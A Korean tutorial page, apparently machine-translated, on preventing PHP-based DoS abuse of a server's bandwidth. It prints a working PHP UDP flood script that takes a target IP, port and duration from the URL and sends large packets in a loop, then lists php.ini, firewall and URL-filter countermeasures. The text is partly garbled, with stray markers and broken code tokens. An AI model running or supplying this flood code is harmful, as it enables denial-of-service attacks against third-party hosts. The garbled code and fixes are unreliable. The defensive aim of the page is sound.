사용자가 PHP 코드 DOS를 사용하여 네트워크 대역폭을 사용하는 것을 방지하는 PHP 코드

PHP 코드를 사용하여 소켓을 호출하고 서버의 네트워크를 직접 사용하여 다른 IP를 공격합니다. 일반적인 코드는 다음과 같습니다.

코드 복사 코드는 다음과 같습니다. 🎜>

$packets = 0;
$ip = $_GET['ip']
$rand = $_GET['port']
set_time_limit(0); 🎜>ignore_user_abort(FALSE) ;
$exec_time = $_GET['time'];
$time = time()
print "Flooded: $rand 포트
"; 🎜>$max_time = $ 시간 $exec_time;
for($i=0;$i<65535;$i ){
$out .= "X"
}
while(1 ){
$ 패킷 ;
if(time() > $max_time){
break
}
$fp = fsockopen("udp://$ip", $rand , $errno, $errstr , 5)
if($fp){
fwrite($fp, $out)
fclose($fp)
}
}
echo "$packets (" . round(($packets*65)/1024, 2) . " mB) 패킷 평균이 ".time('h:i:s')."에 완료되었습니다. ". packets/$exec_time, 2 ) . " packets/s \n";
?>


특징:
IIS가 켜지자마자 서버의 발신 대역폭이 사용됩니다. up ----- 즉, 서버가 지속적으로 다른 사람에게 패킷을 보내는 것은 DDOS의 공격을 받는 것과 다릅니다.

해결책:
위 코드를 비활성화합니다. 🎜>c:windowsphp.ini에 설정:
disable_functions =gzinflate;
c:windowsphp.ini의 값을 Off로 설정
allow_url_fopen = Off

;extension=php_sockets. dll
앞의 “;” 기호는 반드시 yes, 이는 소켓.dll
의 사용을 제한한다는 의미입니다.
앞에 ; 숫자를 유지한 후 IIS를 다시 시작하세요
메서드가 여전히 작동하지 않으면 IIS에서 PHP 확장 테스트를 비활성화하고 확장을 허용할 수 있습니다.
또한 암호화되지 않은 PHP 공격 코드의 경우 다음 방법을 사용하여 처리할 수 있습니다.
1. IP 정책 또는 방화벽, 모든 UDP 전송 금지
2. 1급 정보 모니터링을 사용하고, SQL 차단 및 URL 차단 시 키워드 port=를 차단합니다.
위 내용은 PHP 코드를 사용하는 DOS로 인해 사용자가 네트워크 대역폭을 소모하는 것을 방지하기 위한 PHP 코드에 대한 내용을 포함하여 PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다.